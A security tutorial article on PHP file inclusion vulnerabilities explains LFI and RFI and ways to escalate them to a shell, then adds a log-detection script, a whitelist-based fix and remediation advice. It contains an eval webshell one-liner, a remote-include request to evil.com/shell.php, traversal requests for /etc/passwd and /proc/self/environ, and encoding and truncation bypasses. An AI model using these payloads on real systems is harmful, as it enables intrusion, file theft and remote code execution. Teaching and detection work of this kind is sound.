[Network Security] Summary of file inclusion vulnerabilities

Table of contents:

  1. Introduction
  2. File inclusion vulnerability classification
    1. LFI
    2. RFI
  3. PHP file inclusion functions
  4. Vulnerability sample code
  5. Arbitrary file read
    1. Using PHP wrapper protocols
      1. php://filter
      2. php://input
    2. RFI getshell
    3. LFI + file upload getshell
    4. LFI + log file getshell
    5. LFI + /proc/self/environ getshell
    6. LFI + phpinfo getshell
    7. LFI + session getshell
  6. Bypassing a fixed prefix
    1. Fixed suffix
  7. Remediation suggestions

Introduction

File inclusion vulnerabilities are a form of code injection. To avoid writing the same code repeatedly, languages provide file inclusion functions: a file is pulled in through such a function and its code is used directly. Put simply, one file includes one or more other files.

Besides regular code files, any included file, whatever its extension, is executed as code. So if there is a point where the user controls the path of the included file, it is very likely that an unintended file can be included and unintended code executed, which leads to getshell.

Almost all scripting languages provide file inclusion, but most file inclusion vulnerabilities are found in PHP web applications; they are very rare or absent in JSP and ASP. The root cause lies in the language's design. The rest of this article therefore focuses on PHP.

File inclusion vulnerability classification

File inclusion in PHP is divided into local file inclusion and remote file inclusion.

LFI

Local File Include (LFI)

If the content of the included file complies with PHP syntax, PHP parses and executes it regardless of the file's extension.

If the content of the included file does not conform to PHP syntax, its source is output instead (equivalent to reading the file).

RFI

Remote File Include (RFI)

To use remote inclusion, first check whether the remote include option is enabled in PHP (it is disabled by default: allow_url_include=Off). To enable it, modify the php.ini configuration file.

Remote inclusion is no different from local inclusion except that it loads files from remote locations, which makes getshell easier. Whatever the extension, as long as the content follows PHP syntax, the PHP parser will execute it.

PHP file inclusion functions

PHP provides four file inclusion functions: include(), include_once(), require() and require_once(). All four can be used for file inclusion, but they behave differently.

  • include: If the included file cannot be found, only a warning is generated and the script continues to execute.

  • include_once: Same as include(), except that if the file has already been included, it is not included again.

  • require: Generates a fatal error and stops the script if the included file cannot be found.

  • require_once: Same as require(), except that if the file has already been included, it is not included again.

Vulnerability sample code

<?php
// index.php
$file = $_GET['file'];
include $file;
?>

Quickly start a simple web server that parses PHP:

php -S 127.0.0.1:9999

Test:

http://127.0.0.1:9999/index.php?file=/etc/passwd


Arbitrary file read

If the content of the included file does not conform to PHP syntax, the file content is returned directly, which is equivalent to reading an arbitrary file. This is the same as arbitrary file read/download, so it is not covered in detail here.

Using PHP wrapper protocols

PHP ships with many built-in URL-style wrappers.

php://filter

Normally the code in an included PHP file is executed directly, but if we want the source of a PHP file such as config.php, we can read it through the php://filter wrapper:

http://127.0.0.1:9999/index.php?file=php://filter/read=convert.base64-encode/resource=shell.png

php://input

Conditions for use: allow_url_include=on must be enabled; allow_url_fopen is not required.

RFI getshell

If remote file inclusion is supported, http://127.0.0.1:9999/index.php?file=http://evil.com/shell.php gives getshell directly. Such cases are rare, so no more is said about them.

LFI + file upload getshell

This is the most obvious way to turn a local file inclusion into getshell.

If the website has an LFI vulnerability and an upload feature (avatars, certification documents, etc.), we can upload a file of any extension, such as .png, that contains malicious code.

The content of the .png file is:

<?php @eval($_GET['shell']);?>

Use it as follows:

http://127.0.0.1:9999/index.php?file=shell.png&shell=phpinfo();

[!tip]

The uploaded file may contain a lot of noise that clutters the page output; in that case a webshell can be written separately to another file through functions such as file_put_contents().

LFI + log file getshell

Log files record our requests. If we know the location of the log file, we can write malicious PHP code into the log and then execute it through the file inclusion vulnerability.

Example:

URL access

http://127.0.0.1:9999/index.php?file=shell.png&test=<?php @eval($_GET['shell']);?>

The payload will be recorded in the log file, and the log file is as follows

We only need to include this log file to getshell.

Log default path:

There may be some discrepancies; the actual environment takes precedence.

LFI + /proc/self/environ getshell

On Linux, if PHP runs in CGI mode, /proc/self/environ contains the User-Agent from the request headers, so it can be used to getshell:

GET lfi.php?file=../../../../../../proc/self/environ HTTP/1.1
User-Agent: <?php phpinfo();?>

LFI + phpinfo getshell

Besides an LFI vulnerability, a phpinfo() page must also exist.

Principle: POST a file upload to the phpinfo() page. PHP saves the upload as a temporary file, usually at /tmp/php[6 random characters], which is deleted when the request ends. Exploiting this is similar to a race condition.

When using it, the parameters in the tool and the target parameters must be adjusted to fit.

LFI + session getshell

This method is of limited practical use, since it requires control over the session contents. Generally, first check which parts of the session are controllable.

The save path of PHP session files can be seen in session.save_path in phpinfo.

Common PHP session storage locations:

/var/lib/php/sess_PHPSESSID
/var/lib/php/sessions
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSI

If you can control the session content, that is equivalent to controlling the content of a file under /var/lib/php/sessions; combined with the earlier steps, you can getshell directly.

Bypassing a fixed prefix

Vulnerable code:

<?php
$file = $_GET['file'];
include '/var/www/html/' . $file;
?>

Bypass methods:

Jump to other directories using the ../ traversal sequence, for example ../../../proc/self/environ

Or, still using ../, encode the content:

  • URL encoding

  • Double URL encoding

  • Encodings supported by the container/server, e.g. ..%c0%af == ../ and ..%c1%9c == ..\

Fixed suffix

Vulnerable code:

<?php
$file = $_GET['file'];
include $file . '/test/test.php';
?>

Bypass methods:

If RFI is supported, ? and # can be used for the bypass: ? starts the query string and # the fragment, neither of which affects the actual URL fetched.

Use the zip:// or phar:// pseudo-protocols. Taking zip as an example, first create an archive whose compressed directory is test/test/test.php, then include it as zip://xxx.zip#test

With PHP < 5.2.8, path length truncation can be used: repeat ./ until the maximum path length is reached (4096 bytes on Linux, 256 bytes on Windows); anything beyond that is dropped, for example shell.php/./././././(omitted)/./././. Be careful not to exceed the maximum request length supported by the container, otherwise it reports that the GET request is too long.

With PHP < 5.3.4 and magic_quotes_gpc=off, null-byte (%00) truncation works, similar to 00 truncation in file upload: the backend mistakenly treats the null byte as the end of the string.
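The bypass techniques above, together with the wrapper, log-poisoning and /proc/self/environ sections, describe what an inclusion attempt looks like on the wire. The following is an added example (not code from the original post) of detection logic that normalises a request URI the way those sections describe and flags the payload classes this page discusses; the access-log lines are constructed for the example.

```php
<?php
// Added example, not from the original post: detection logic for the inclusion
// payloads discussed on this page (../ traversal, single and double URL encoding,
// overlong UTF-8 slashes, %00 truncation, php:// and zip:// wrappers, remote URLs,
// /proc/self/environ, and PHP tags in the User-Agent used for log poisoning).
// The access-log lines below are constructed for this example (Apache combined format).
declare(strict_types=1);

function normaliseUri(string $uri): string
{
    // Decode at most twice so double-encoded payloads such as %252e%252e%252f are seen.
    for ($i = 0; $i < 2 && ($decoded = rawurldecode($uri)) !== $uri; $i++) {
        $uri = $decoded;
    }
    // Overlong UTF-8 encodings of '/' and '\' from the bypass section, plus backslashes.
    return str_replace(["\xC0\xAF", "\xC1\x9C", '\\'], '/', $uri);
}

function classifyRequest(string $uri, string $userAgent = ''): array
{
    $normalised = normaliseUri($uri);
    $checks = [
        'path-traversal' => '~(^|[/=])\.\./~',
        'null-byte'      => '~\x00~',
        'php-wrapper'    => '~\b(php|zip|phar|data)://~i',
        'remote-include' => '~[?&][^=&]+=(https?|ftp)://~i',
        'proc-environ'   => '~/proc/self/environ~',
    ];
    $hits = [];
    foreach ($checks as $label => $pattern) {
        if (preg_match($pattern, $normalised)) {
            $hits[] = $label;
        }
    }
    if (preg_match('~<\?(php|=)~i', $userAgent)) {
        $hits[] = 'php-tag-in-user-agent';
    }
    return $hits;
}
$logLines = [
    '10.0.0.5 - - [01/May/2023:10:00:00 +0000] "GET /index.php?file=about.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/May/2023:10:00:01 +0000] "GET /index.php?file=..%252f..%252f..%252fetc/passwd HTTP/1.1" 200 1200 "-" "curl/8.0"',
    '10.0.0.9 - - [01/May/2023:10:00:02 +0000] "GET /index.php?file=php://filter/read=convert.base64-encode/resource=config.php HTTP/1.1" 200 900 "-" "curl/8.0"',
    '10.0.0.9 - - [01/May/2023:10:00:03 +0000] "GET /index.php?file=..%c0%af..%c0%afproc/self/environ HTTP/1.1" 200 700 "-" "<?php phpinfo();?>"',
];
foreach ($logLines as $line) {
    // Pull the request URI and the User-Agent out of the combined-format line.
    if (!preg_match('~"(?:GET|POST) (\S+) [^"]*" \d+ \S+ "[^"]*" "([^"]*)"$~', $line, $m)) { continue; }
    $hits = classifyRequest($m[1], $m[2]);
    printf("%s %s\n", $hits ? 'ALERT: ' . implode(', ', $hits) : 'ok', $m[1]);
}
```

The first line is reported as ok; the other three are flagged as path-traversal, php-wrapper, and path-traversal plus proc-environ plus php-tag-in-user-agent respectively.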

Remediation suggestions

  • Filter special characters such as . (dot), / (slash) and \ (backslash).

  • Disable the allow_url_include configuration where possible.

  • Use PHP's open_basedir configuration to restrict file access to specified directories.

  • Maintain a whitelist of the files that may be included.
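As an added example (not code from the original post), here is a hardened version of the vulnerable index.php shown earlier that applies the whitelist advice above plus a canonical-path check; PAGE_DIR and the page names are hypothetical.

```php
<?php
// Added example, not from the original post: a hardened replacement for the
// vulnerable index.php shown earlier. PAGE_DIR is a hypothetical directory.
declare(strict_types=1);

const PAGE_DIR = '/var/www/html/pages';

// Whitelist: the only names a user may request. Each value is a fixed file name,
// so no user-controlled bytes (../, php://, http://, %00) ever reach include().
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolvePage(string $requested): ?string
{
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;                               // not on the whitelist
    }
    $base = realpath(PAGE_DIR);
    $real = realpath(PAGE_DIR . DIRECTORY_SEPARATOR . ALLOWED_PAGES[$requested]);
    if ($base === false || $real === false) {
        return null;                               // file missing or unreadable
    }
    // Defence in depth: realpath() resolves symlinks and ../ segments; require
    // the canonical path to remain inside PAGE_DIR and to keep the .php suffix.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    if (substr($real, -4) !== '.php') {
        return null;
    }
    return $real;
}

$requested = $_GET['page'] ?? 'home';
$page = is_string($requested) ? resolvePage($requested) : null;
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $page; // always a whitelisted, canonical path under PAGE_DIR
```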


Origin blog.csdn.net/zxcvbnmasdflzl/article/details/130424805